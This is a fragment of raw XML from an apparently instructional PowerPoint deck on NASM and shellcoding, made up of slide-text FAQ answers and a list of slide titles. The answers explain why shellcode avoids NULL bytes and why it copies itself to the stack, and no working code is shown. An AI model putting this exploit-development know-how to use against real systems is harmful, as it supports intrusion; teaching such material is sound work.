        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3483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22902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What's the hype with making sure the shellcode won't have any NULL bytes in it? Normal programs have lots of NULL bytes!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Well this isn't a normal program! The main problem arises in the fact that when the exploit is inserted it will be a string.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 all know, strings are terminated with a NULL byte (C style strings anyhow). If we have a NULL byte in our shellcode things won't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230248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does my shellcode program crash when I run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Well, in most shellcode the assembly contained within has some sort of self modifying qualities.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we are working in protected mode operating systems the .code segment of the executable image is read only.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why the shell program needs to copy itself to the stack before attempting execution.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92937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900</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>138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NASM and Shellcoding</vt:lpstr>
      <vt:lpstr>Reference</vt:lpstr>
      <vt:lpstr>What is shellcoding?</vt:lpstr>
      <vt:lpstr>Why should I write my own?</vt:lpstr>
      <vt:lpstr>What do I need to know before I begin?</vt:lpstr>
      <vt:lpstr>What are the differences between windows shellcode and Linux shellcode?</vt:lpstr>
      <vt:lpstr>What are the differences between windows shellcode and Linux shellcode?</vt:lpstr>
      <vt:lpstr>What's the hype with making sure the shellcode won't have any NULL bytes in it? Normal programs have lots of NULL bytes!</vt:lpstr>
      <vt:lpstr>Why does my shellcode program crash when I run it?</vt:lpstr>
      <vt:lpstr>Why does my program keep segfaulting?</vt:lpstr>
      <vt:lpstr>installation</vt:lpstr>
      <vt:lpstr>Hello World Example</vt:lpstr>
      <vt:lpstr>Hello World Result</vt:lpstr>
      <vt:lpstr>Linux Shellcoding</vt:lpstr>
      <vt:lpstr>Example 1 - Making a Quick Exit</vt:lpstr>
      <vt:lpstr>Extract Byte Code</vt:lpstr>
      <vt:lpstr>GNU linker</vt:lpstr>
      <vt:lpstr>Important</vt:lpstr>
      <vt:lpstr>Lab </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Extra Credits</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Gannon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NASM</dc:title>
  <dc:creator>PC_Tech</dc:creator>
  <cp:lastModifiedBy>PC_Tech</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-01-25T02:12:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-01-28T20:02:19Z</dcterms:modified>
</cp:coreProperties>
</file>